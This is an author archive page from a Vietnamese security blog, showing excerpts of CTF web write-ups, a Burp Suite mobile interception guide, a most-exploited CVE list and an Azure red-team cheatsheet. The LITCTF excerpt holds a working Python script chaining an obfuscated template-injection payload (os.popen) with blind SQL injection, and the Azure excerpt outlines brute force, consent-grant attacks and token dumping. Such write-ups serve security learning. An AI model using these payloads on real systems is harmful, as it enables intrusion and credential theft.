Author Archives: Nhat Truong

CÁC TIÊU CHÍ BẢO VỆ ỨNG DỤNG MOBILE

Bảo vệ ứng dụng mobile là một công việc không hề dễ, một ứng dụng mobile hiện đại (đặc biệt là tài chính, ngân hàng) sẽ phải đối mặt và gặp nhiều thách thức bởi sự tấn công của các tin tặc. nhattruong.blog xin đưa ra một số tiêu chí để bảo vệ cho ứngContinue reading “CÁC TIÊU CHÍ BẢO VỆ ỨNG DỤNG MOBILE”

[Write-Up] NullCon CTF 2022 – Web

1. Jsonify 12345678910111213141516171819202122232425 classFlag{    public$isAllowedToSeeFlag;    public$flagfile;    public$properties= array(“isAllowedToSeeFlag”,”flagfile”);    publicfunction__shutdown(){        return$this->properties;    }}$obj= newFlag();$obj->isAllowedToSeeFlag = true;$obj->flagfile = “./flag.php”;//hàm này có sẵn trong source codefunctionsecure_jsonify($obj){    $data= array();    $data[‘class’] = get_class($obj);    $data[‘properties’] = array();    foreach($obj->__shutdown() as& $key){        $data[‘properties’][$key] = serialize($obj->$key);    }    returnjson_encode($data);}echosecure_jsonify($obj); 2. Unis Love Code 3. Repass 123456789101112131415161718192021222324252627 importhashlibimportrandomfromdatetime importdatetimeimporttime# timestamp = int(time.time())# print(timestamp)timestamp =1660578999dt_object =datetime.fromtimestamp(timestamp)print(“time:”, dt_object)username =”ctf”rng_init =f”{username}:{timestamp // 10}”rng =random.Random(int.from_bytes(rng_init.encode(), byteorder=’little’))p_o_w =”pow:”+”.join([b forb inchr(rng.randint(97, 122)) fori inrange(rng.randint(10, 15))])print(p_o_w)key =1forsecretContinue reading “[Write-Up] NullCon CTF 2022 – Web”

[Write-Up] LITCTF – web challenge

1. Amy The Hedgehog 2. Secure Website 3. Emoji 1234567891011121314151617181920 #!pythonimportrequestsbase=”””{{request|attr(‘application’)|attr(‘\x5f\x5fglobals\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fbuiltins\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fimport\x5f\x5f’)(‘os’)|attr(‘popen’)(“python3 -c ” + “\\”exec(‘{i}’)\\””)|attr(‘read’)()}}”””flag=””j=1whileTrue:    fori inrange(32,127):        inject=”””import requests;  r = requests.post(r\\”http://172.24.0.8:8080/runquery\\”, json={{\\”username\\”: \\”flag\\’ and substr(password,{j},1)=char({i});–\\”,\\”password\\”: \\”\\”}});print(r.text)”””.format(j=j,i=i)        c=”.join([hex(ord(inject[i])).replace(‘0x’,’\\x’) fori inrange(len(inject))])        payload={            ‘username’:’a’,            ‘password’:”{“+base.format(i=c)+”}”        }        r=requests.post(‘http://litctf.live:31781/’,data=payload,headers={“Content-Type”: “application/x-www-form-urlencoded”})        if”True”inr.text:            flag+=chr(i)            j+=1            print(flag)            break Tham khảo:

[Basic] Hướng dẫn bắt gói tin App Mobile bằng Burpsuite

Anh em lưu ý, cài sẵn java 9 trở lên trong máy nhé. Sau đây là các bước cài đặt burpsuite và bắt gói tin app android Bước 1: Download Burpsuite Community tại: Bước 2: Chạy file rồi cài đặt Next Chọn thư mục Xong next đến chết…rồi finish, burp sẽ được chạy Bước 3:Continue reading “[Basic] Hướng dẫn bắt gói tin App Mobile bằng Burpsuite”

Top các CVE được khai thác nhiều nhất mọi thời đại (2017-now, keep updated)

Sau đây là top các lỗ hổng được hacker ưa chuộng nhất mọi thời đại (mọi thời đại là từ năm 2017 nhé ae :v). Có thể nói các bug hunter, hacker mà vớ được host có các lỗi này thì lại rất sướng, xiên không ngừng. Một phần các lỗi này ngày xưa cũngContinue reading “Top các CVE được khai thác nhiều nhất mọi thời đại (2017-now, keep updated)”

Azure Redteam Cheatsheet

I. Reconnaissance (external) Update useful tool: https://github.com/nyxgeek/o365recon Find the subdomain of the target Using microBurst enum email: II. Reconnaissance (internal) Using RoadTool Using StormSpotter Using Bloodhound, Azurehound III. Initial attack Brute force Illicit Consent Grant attack. Using IV. Lateral movement Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code: Check DeploymentsContinue reading “Azure Redteam Cheatsheet”